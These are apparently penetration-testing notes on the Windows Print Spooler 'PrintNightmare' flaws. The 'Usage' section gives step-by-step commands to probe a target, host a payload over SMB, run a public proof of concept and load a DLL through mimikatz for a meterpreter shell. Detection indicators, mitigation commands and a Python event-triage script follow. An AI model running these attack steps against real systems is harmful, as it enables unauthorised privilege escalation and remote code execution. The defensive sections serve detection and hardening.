# Print Nightmare

* Privilege escalation using the Print Spooler service
* Located at `C:\Windows\System32\spoolsv.exe`
* Enabled by default
* [CVE-2021-1675](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675) (locally exploitable) and [CVE-2021-34527](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527) (RCE) are both related to the print spooler
* The RCE connection goes over [DCE/RPC](https://wiki.wireshark.org/DCE/RPC), using `RpcAddPrinterDriver` or `RpcAddPrinterDriverEx`

## Usage

* Prepare a reverse shell
* Check whether the target is likely vulnerable (the spooler exposes the MS-RPRN or MS-PAR interface)

```sh
rpcdump.py @$TARGET_IP | grep -E 'MS-RPRN|MS-PAR'
```

* Start an SMB server

```sh
smbserver.py share . -smb2support
```

* Execute the PoC with credentials to elevate

```sh
python CVE-2021-1675.py /:@$TARGET_IP
```

* Use the meterpreter session

### Mimikatz

* PrintNightmare module of mimikatz

```sh
misc::printnightmare /target: /authuser: /authpassword: /library:\\path\to\printnightmare.dll
```

## IOCs

* `RpcAddPrinterDriverEx()` is called
* [Sygnia](https://www.sygnia.co/demystifying-the-printnightmare-vulnerability) explains them
* [Splunk queries](https://www.splunk.com/en_us/blog/security/i-pity-the-spool-detecting-printnightmare-cve-2021-34527.html)
* Logs are `Microsoft-Windows-PrintService/Admin` and `Microsoft-Windows-PrintService/Operational`
* Event IDs `316, 808, 811, 31017, 7031`

## Mitigation

* [link](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527)
* Stop and disable the service

```powershell
Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled
```

* Disable via group policy

```
Computer Configuration/Administrative Templates/Printers
```
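Added triage example (not from the original notes or any of the linked tools) for the IOC section: it runs the event-ID checks over constructed, simplified event records. Assumptions: event 316 is "printer driver added/updated", 808 is "spooler failed to load a plug-in module", 7031 is the Service Control Manager crash record, and message text is a simplified stand-in for the real event wording.

```python
"""Flag PrintService events consistent with the PrintNightmare IoCs above.
Sample events are constructed; messages are simplified, not the exact Windows wording."""
import re
from dataclasses import dataclass

# Legitimate drivers are staged under the spooler driver store (assumed canonical path).
SPOOL_DRIVER_DIR = r"c:\windows\system32\spool\drivers"
PRINT_LOGS = ("Microsoft-Windows-PrintService/Admin", "Microsoft-Windows-PrintService/Operational")


@dataclass
class Event:
    log: str
    event_id: int
    message: str


def suspicious_driver_paths(message: str) -> list:
    """Return driver file paths that are UNC shares or outside the spooler driver store."""
    paths = re.findall(r"(?i)(\\\\[^\s,;]+|[a-z]:\\[^\s,;]+)", message)
    return [p for p in paths if p.startswith("\\\\") or not p.lower().startswith(SPOOL_DRIVER_DIR)]


def triage(events: list) -> list:
    """Return (event, reason) pairs worth analyst attention, using IDs 316, 808 and 7031."""
    hits, saw_driver_add = [], False
    for ev in events:
        if ev.log in PRINT_LOGS and ev.event_id == 316:  # driver added or updated
            saw_driver_add = True
            bad = suspicious_driver_paths(ev.message)
            if bad:
                hits.append((ev, "driver added from unexpected location: " + ", ".join(bad)))
        elif ev.log in PRINT_LOGS and ev.event_id == 808:  # plug-in module failed to load
            hits.append((ev, "spooler failed to load a plug-in module"))
        elif ev.event_id == 7031 and "spooler" in ev.message.lower() and saw_driver_add:
            hits.append((ev, "spooler service crashed after a driver add"))
    return hits


# Constructed sample events (hostnames and file names are placeholders).
SAMPLE_EVENTS = [
    Event(PRINT_LOGS[1], 316, r"Printer driver HP Universal was added. Files: C:\Windows\System32\spool\drivers\x64\3\hpcu.dll"),
    Event(PRINT_LOGS[1], 316, r"Printer driver 1234 was added. Files: \\fileserver\share\driver.dll"),
    Event(PRINT_LOGS[0], 808, r"The print spooler failed to load a plug-in module C:\Windows\System32\spool\drivers\x64\3\old\driver.dll"),
    Event("System", 7031, "The Print Spooler service terminated unexpectedly."),
]

if __name__ == "__main__":
    for ev, reason in triage(SAMPLE_EVENTS):
        print(f"[{ev.log}] event {ev.event_id}: {reason}")
```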